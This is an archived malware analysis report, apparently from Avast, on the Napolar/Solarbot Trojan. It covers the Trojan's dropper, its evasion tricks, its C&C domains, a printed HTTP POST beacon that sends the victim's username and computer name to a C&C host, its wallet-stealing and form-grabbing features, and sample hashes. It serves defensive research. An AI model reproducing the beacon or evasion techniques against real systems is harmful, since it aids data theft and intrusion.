{
	"id": "190727a8-e53e-4e0e-8b8b-26c5958667d4",
	"created_at": "2026-04-10T03:20:58.219609Z",
	"updated_at": "2026-04-10T03:22:18.978114Z",
	"deleted_at": null,
	"sha1_hash": "a215df1efbdb45459fea1fe4387a5afdf9709f70",
	"title": "Win32/64:Napolar: New Trojan shines on the cyber crime-scene",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 982332,
	"plain_text": "Win32/64:Napolar: New Trojan shines on the cyber crime-scene\r\nBy Threat Intelligence Team 25 Sep 2013\r\nArchived: 2026-04-10 02:22:00 UTC\r\nWin32/64:Napolar: New Trojan shines on the cyber crime-scene\r\nIn recent weeks, malware samples resolved as Win32/64:Napolar from AVAST's name pools generated a lot of hits\r\nwithin our file and network shields. Independently, we observed an advertising campaign of a new Trojan dubbed\r\nSolarbot that started around May 2013. This campaign did not run through shady hacking forums as we are used\r\nto, but instead it ran through a website indexed in the main search engines. The website is called http://solarbot.net\r\nand presents its offer with a professional looking design:\r\nFor the Win32/64:Napolar Trojan, the pipe used to inter-process communication is named \\\\.\\pipe\\napSolar.\r\nTogether with the presence of character strings like \"CHROME.DLL,\" \"OPERA.DLL,\" \"trusteer,\" \"data_inject,\"\r\nand features we'll mention later, we have almost no doubts that the Trojan and Solarbot coincide. Let us look at\r\nsome analysis.\r\nDropper\r\nAn initial binary comes in the form of an SFX archive named in a similar fashion as Photo_021-\r\nWWW.FACEBOOK.COM.exe that handles two events: A silent execution of the Trojan's dropper and the display of\r\na distracting image of girls:\r\nhttps://blog.avast.com/2013/09/25/win3264napolar-new-trojan-shines-on-the-cyber-crime-scene/\r\nPage 1 of 7\n\nInformation from the author's statement, says that Solarbot was written in Lazarus IDE for Free Pascal. We cannot\r\nrecollect any professional or commercial Trojan that shares this property. On the other hand, we can not confirm\r\nthat the analyzed binary is written in Free Pascal, because a lot of information in the PE header differs from the\r\nusual binaries compiled by Free Pascal.\r\nThe structure of the core executable is as follows:\r\nhttps://blog.avast.com/2013/09/25/win3264napolar-new-trojan-shines-on-the-cyber-crime-scene/\r\nPage 2 of 7\n\nThe initial x86 part also serves for a recognition of the system's architecture. In the case of a 64bit system, a\r\ncorrespondent module is extracted and loaded. The LDE64 (Length Disassembler Engine) is a 32 bit official tool\r\nbased on BeaEngine able to decode instruction in 32 bits and 64 bits architectures. Disassembling could be needed\r\nfor a fine modification of system functions (correct hooking with a custom one or emulating a chunk of original\r\ncode).\r\nAs described on the advertising page, all important WINAPI functions from KERNEL32.DLL, NTDLL.DLL,\r\nWININET.DLL, WS2_32.DLL, SHLWAPI.DLL, PSAPI.DLL are resolved by CRC32 hash (the constant table of\r\nCRC32 hash algorithm is found at the address 0xFF395A) and stored in a virtual table. Also a few anti-debugging\r\ntricks related with IsDebuggerPresent and OutputDebugString functions have been observed. The bot after\r\ninstallation into %AppData\\lsass.exe starts its instance at newly allocated memory at the virtual address 0xFE0000\r\nand terminates itself. That means that it cannot be identified in the list of running processes.\r\nTo find the distribution of this infection we analyzed manifestations of part of related detections. The incidence\r\nreaches at least several hundred unique computers a day and it could be a little more for all Solarbot samples.\r\nPlaces most affected with the infection are the South and Central American countries of Colombia, Venezuela,\r\nPeru, Mexico, and Argentina; the Asian countries of the Philippines and Vietnam, and Poland in Europe:\r\nhttps://blog.avast.com/2013/09/25/win3264napolar-new-trojan-shines-on-the-cyber-crime-scene/\r\nPage 3 of 7\n\nCommunication protocol\r\nA few gate URLs (C\u0026C servers) have been identified so far: xyz25.com, cmeef.info, paloshke.org. The latter is\r\nregistered by the infamous Bizcn.com, Inc. We have blogged about fake repair tools with domains registered with\r\nthis fraudulent Chinese registrar in the past. The advertising site solarbot.net is registered with the following info:\r\nDomain Name: SOLARBOT.NET\r\nRegistrar: NETEARTH ONE INC. D/B/A NETEARTH\r\nWhois Server: whois.advancedregistrar.com\r\nReferral URL: http://www.advancedregistrar.com\r\nName Server: NS1.BITCOIN-DNS.COM\r\nName Server: NS2.BITCOIN-DNS.COM\r\nStatus: clientTransferProhibited\r\nUpdated Date: 01-aug-2013\r\nCreation Date: 01-aug-2013\r\nExpiration Date: 01-aug-2014\r\nand the registrant's contact data are hidden behind PRIVACYPROTECT.ORG which is a service attracted by\r\nvarious groups involved in malicious activities.\r\nhttps://blog.avast.com/2013/09/25/win3264napolar-new-trojan-shines-on-the-cyber-crime-scene/\r\nPage 4 of 7\n\nAn initial HTTP POST request for getting a command to be executed looks like this:\r\nPOST / HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR\r\n2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)\r\nHost: www.paloshke.org\r\nContent-Length: 81\r\nPragma: no-cache\r\nv=1.0\u0026u=USER_NAME\u0026c=COMP_NAME\u0026s={7C79CE12-E753-D05E-0DE6-\r\nDFBF7B79CE12}\u0026w=2.5.1\u0026b=32\r\nwhere s string denotes a key for a consequent RC4 decryption generated from a victim's environment and v stands\r\nfor the bot's version. Number 1.0 suggests that we are facing the initial development stage of this bot.\r\nAfter a successful request, a response follows. As we mentioned, it is encrypted with RC4 and the right key is sent\r\nunencrypted in the POST query. The plain response structure takes the form of an array of strings separated with\r\nzero byte. Every string starts with a byte identifying a command number (a total of 15 various switch cases were\r\nobserved) appended with a corresponding plain string. For a connection delay (command 0xC), it is the count of\r\nseconds (we have seen 3600 usually); for a command related to a download, it is a URL to a file followed by a\r\ncontrol hash and a decryption key (command 0x12); for an installation of additional binaries serves command 0x2,\r\ne.g. a download of the Bitcoin wallet stealing plugin called WalletSteal.bin. By definition from bitcoin.org, a\r\nBitcoin wallet is the equivalent of a physical wallet on the Bitcoin network which contains private keys that\r\nallows a user to spend the Bitcoins allocated to it in a public record of Bitcoin transactions. Actually, this is an\r\nexample of the promised plugin support. The plugin is placed encrypted in the temporary directory SlrPlugin in\r\n%AppData.\r\nFeatures\r\nThe following list of features is presented officially on the website:\r\nhttps://blog.avast.com/2013/09/25/win3264napolar-new-trojan-shines-on-the-cyber-crime-scene/\r\nPage 5 of 7\n\nWe have seen implemented functionalities like FTP and POP3 Grabber, Reverse Socks 5 or basis of functional\r\nmodularity. There were relevant strings (\"SSL\", \"http://\", \"http://\", names of web browser libraries, \"NSS layer\",\r\n\"data_start\", \"data_inject\", \"data_end\" ) indicating the possibility of man-in-the-browser attacks. Indeed, we\r\nobserved that the content of forms of internet banking sites were sent to C\u0026C in an unencrypted form, but only in\r\nthe case when the site requested a reputation or certificate verification. This could have connection with internal\r\nlist of URLs (http://urs.microsoft.com/urs.asmx; http://ocsp.verisign.com; http://ocsp.comodoca.com;\r\nhttp://safebrowsing.clients.google.com; http://dirpop.naver.com:8088/search.naver), updated remotely with the\r\ninternal command 0xF.\r\nNext, dynamically we have seen a download of a Bitcoin miner that was afterwards injected in a classic Windows\r\nnotepad binary in the system's %Temp directory and executed (corresponds to the point \"MD5 Verified Update\r\nand Download System\" in the list).\r\nIn the end, we have to say that this bot displays solid malicious performance. Together with the reasonable price of\r\n$200, it could be on the rise in the near future. Fortunately, the antivirus industry will react to make the life of\r\nthese cyber-criminals harder.\r\nSources\r\nSHA256 hashes of some selected samples and how they are covered within the AVAST engine:\r\nDropper 1\r\n1f11b896cc641db605d70186be468a148a\r\n64ea233a21d353e7483239e71e1516\r\nWin32:Napolar-E [Cryp]\r\nhttps://blog.avast.com/2013/09/25/win3264napolar-new-trojan-shines-on-the-cyber-crime-scene/\r\nPage 6 of 7\n\nDropper 2\r\nf1a5707963a7e33a925111f09209a92b037\r\n32fa9292697b37e528ad941076a8d\r\nWin32:Napolar-E [Cryp]\r\nNapolar Core Binary\r\n463d39dcbf19b5c4c9e314e5ce77bf8a51\r\n848b8c7d64e4f0a6656b9d28941e2e\r\nWin32:Napolar-D [Trj]\r\nWalletSteal Plugin Download\r\n12ca161cd72873477906100f083e43dca9\r\n36312ba44b691f5046f53b09e3b4f7\r\nJS:NapolarPlugin-A [Trj]\r\nWalletSteal Plugin x86\r\nbb49fa791915bf49ceb2a0563c91d2acaed\r\n6249438f349c6e75094f3924de64d\r\nWin32:NapolarPlugin-B [Trj]\r\nWalletSteal Plugin x64\r\nff92206215115c867789dbd5a95132a2bd1\r\n53bb1e5a1ef66e539f382f2ce30dc\r\nWin32:NapolarPlugin-B [Trj]\r\nSource: https://blog.avast.com/2013/09/25/win3264napolar-new-trojan-shines-on-the-cyber-crime-scene/\r\nhttps://blog.avast.com/2013/09/25/win3264napolar-new-trojan-shines-on-the-cyber-crime-scene/\r\nPage 7 of 7",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://blog.avast.com/2013/09/25/win3264napolar-new-trojan-shines-on-the-cyber-crime-scene/"
	],
	"report_names": [
		"win3264napolar-new-trojan-shines-on-the-cyber-crime-scene"
	],
	"threat_actors": [],
	"ts_created_at": 1775791258,
	"ts_updated_at": 1775791338,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/a215df1efbdb45459fea1fe4387a5afdf9709f70.pdf",
		"text": "https://archive.orkl.eu/a215df1efbdb45459fea1fe4387a5afdf9709f70.txt",
		"img": "https://archive.orkl.eu/a215df1efbdb45459fea1fe4387a5afdf9709f70.jpg"
	}
}